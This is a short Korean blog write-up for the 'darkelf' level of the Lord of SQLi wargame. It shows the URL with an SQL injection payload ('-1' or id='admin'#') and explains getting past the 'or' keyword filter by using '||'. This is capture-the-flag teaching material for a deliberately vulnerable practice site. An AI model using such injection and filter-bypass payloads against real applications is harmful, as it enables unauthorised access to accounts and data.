1. 문제 지문
2. 요약
- 일부 문자와 or,and 문자열이 필터링
- id를 admin으로 만들면 클리어
3. 풀이
wolfman과 비슷한 맥락의 문제이다.
사용할 공격문은 아래와 같다.
https://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php?pw=-1' or id='admin'#
select id from prob_wolfman where id='guest' and pw='-1' or id='admin'#
or는 필터링이 되어 있다고 하니, 이를 우회하기 위해 or의 의미를 가진 || (shift+역슬래쉬)를 두 개 넣어서 공격하였다.
클리어
'Web > LOS' 카테고리의 다른 글
| LOS 풀이 - (08) troll (0) | 2021.07.11 |
|---|---|
| LOS 풀이 - (07) orge (0) | 2019.07.09 |
| LOS 풀이 - (05) wolfman (0) | 2019.07.09 |
| LOS 풀이 - (04) Orc (0) | 2019.07.09 |
| LOS 풀이 - (03) Goblin (0) | 2019.07.09 |